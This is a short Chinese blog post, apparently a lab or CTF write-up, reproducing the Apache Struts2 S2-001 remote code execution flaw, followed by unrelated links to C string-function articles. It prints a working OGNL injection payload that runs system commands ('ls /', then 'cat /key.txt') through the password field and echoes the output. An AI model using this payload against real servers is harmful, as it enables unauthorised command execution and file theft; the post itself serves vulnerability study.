Apache Struts2远程代码执行漏洞(S2-001)复现

最新推荐文章于 2024-12-29 12:43:18 发布
最新推荐文章于 2024-12-29 12:43:18 发布
阅读量867 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36933272/article/details/100183110
版权

根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意
回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
在这里插入图片描述
改一下payload,参数改成“cat”和“/key.txt”
得到key
在这里插入图片描述

qq_36933272
关注
问题三、函数——fgetsgets 的对比
weixin_45641816的博客
03-19 972
fgets函数的学习
C语言常用的标准库函数.doc
05-11
C语言常用的标准库函数是指C语言中提供的一些基本函数,用于实现各种常见的操作,如输入输出、数学计算、字符串处理等。这些函数都被包含在C语言的标准库中,开发者可以通过包含相应的头文件来使用这些函数。 一...
【C语言】puts()和gets()
最新发布
wwweerie的博客
12-29 1451
puts() 和 gets() 是 C 语言中的两个标准输入输出函数,它们用于处理字符串,但有很大不同。在 C11 标准中已被弃用,建议使用 fgets()。功能:puts() 用于输出字符串,并在字符串后附加换行符。参数:单个字符串参数(以 NULL 结尾的字符数组)。返回值:成功返回输入的字符串指针,失败返回 NULL。语法:char *gets(char *str);功能:gets() 用于从标准输入读取一行文本。参数:指向字符数组的指针,用于存放输入的字符串。
(C语言)字符串库
01-20
上一篇 自己动手写字符串库函数 三(C语言) //重置 void my_StrSet(string *des, const char ch) { if (!IsEmpty(des)) return; else { char* des1 = des->str; int desLen = my_StrLen(des->str); while (desLen--) *...
C语言字符串库函数的实现
weixin_33725270的博客
09-04 167
 C语言字符串库函数的实现也是笔试题常考的题目,以下代码没有严格测试,只是简单的实现: //字符串长度 int strlen(const char *str) { assert(str != NULL); int len = 0; while (*str ++ != '\0') ++ len; ...
C语言----详解字符串相关的库函数(建议收藏)
热门推荐
baiyang2001的博客
09-19 1万+
文章目录 系列文章目录 前言 一、C语言相关字符串库函数一览表 二、strlen函数 三、strcpy函数 四、 前言 C语言的库函数,是我们经常在编写程序所用到的函数,我们可以借用库函数去实现各种各样的功能,在本篇文章,我们介绍的是C语言中字符串和字符的相关库函数,以及他们的模拟实现,通过模拟实现我们可以深入了解到库函数的工作原理,以便今后更好的使用 一、C语言相关字符串库函数一览表 求字符串长度 strlen 长度不受限制的字符串函数 strcpy s..
C语言字符串操作常用函数
hanzengyi的专栏
07-20 6699
<br />函数名: strrchr <br />功  能: 在串中查找指定字符的最后一个出现 <br />用  法: char *strrchr(char *str, char c); <br />举例: char fullname="./lib/lib1.so"; char *ptr; ptr = strrchr(fullname,'/'); printf("filename is %s",++ptr); //运行结果:filename is lib1.so<br /> <br />函数名: s
C语言:字符串常用函数总结(自用,保持更新)
2302_80190698的博客
04-21 2787
注意:大部分字符串的库函数在使用前都需要加入头文件#include目录1.strlen函数注意事项2.strcpy函数与strncpy函数strcpy 函数注意事项strncpy 函数注意事项3.strcat与strncat函数strcat(用于字符串连接)注意事项strncat函数注意事项4.strcmp函数与strncmp函数strcmp 函数示例返回值strncmp 函数5.strchr函数与strrchr函数以及strstr函数strchr 函数返回值注意事项strrchr 函数
C语言数字转化为字符串的库函数
01-19
 功 能:把一整数转换为字符串  用 法:char *itoa(int value, char *string, int radix);  详细解释:itoa是英文integer to array(将int整型数转化为一个字符串,并将值保存在数组string中)的缩写.  参数:  ...
C语言常用的库函数总结
07-25
以下是对C语言常用函数的详细知识点总结: 一、标准定义 标准定义涉及的是C语言中用于数据类型和宏定义的基本定义。其中包括: - `size_t`:使用`sizeof`运算符时得到的结果类型,通常是一个无符号整数类型。 - `...
C语言自定义字符串库函数实现详解
3. **字符串库函数的实现方法**:实现字符串函数通常需要掌握C语言中的指针、数组操作,以及内存管理。比如,描述中提到的`my_StrSet`函数,其目的可能是将一个字符串中的所有字符设置为指定的字符`ch`。实现这样的...
C语言常用的标准库函数.pdf
09-30
C语言常用的标准库函数涵盖了从基础类型定义到文件操作、字符串处理、数学计算等多个方面,对于编程人员来说,掌握这些函数的使用是进行C语言编程的基础。接下来,我将对C标准库中的常用函数进行详细说明。 首先...
C语言——字符串库函数
2301_80817503的博客
08-11 539
C语言中有很多库函数,其中字符串库函数(string.h)是我们经常接触的,所以我们将会简单介绍一些字符串库函数并进行模拟实现。这就是本篇文章所要介绍的函数了,除此之外,字符串库函数中还有许多函数,大家可以自行探索。如果有错误,欢迎大家来指出。
C语言常用到的字符串库函数
m0_61500331的博客
02-11 751
包含了C语言初期常用到的字符串库函数的使用和部分模拟实现的方法,算是一份知识汇总
C语言字符串库函数大全
xiaozihua的博客
09-12 455
;;;;''
c语言--字符串库函数的介绍,使用以及模拟实现
2303_80645930的博客
08-14 1294
c语言中一些基础的库函数
C库字符串函数
ngany的博客
06-05 469
头文件<string.h> strlen 用于统计字符串的长度 strcat()(用于拼接字符串) 函数接受两个字符串作为参数。 该函数把第2个字符串的备份附加在第1个字符串末尾, 并把拼接后形成的新字符串作为第1个字符串, 第2个字符串不变。无法检查第1个数组是否能容纳第2个字符串。 如果分配给第1个数组的空间不够大, 多出来的字符溢出到相邻存储单元时就会出问题。 strnca...
C语言字符串库函数详解
m0_50734673的博客
06-06 627
C语言字符串库函数详解 1.strlen函数:求字符串长度 int main() { char arr1[] = "abc"; char arr2[] = { 'a', 'b', 'c' }; int len1 = my_strlen(arr1); int len2 = strlen(arr2); printf("%d\n", len1); //输出3,字符串长度不包括"\0" printf("%d\n", len2); //输出随机值,因为字符串arr2没有'\0',strlen找不到终点
C语言字符串库函数
Jambo!的博客
02-03 1647
字符串库函数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值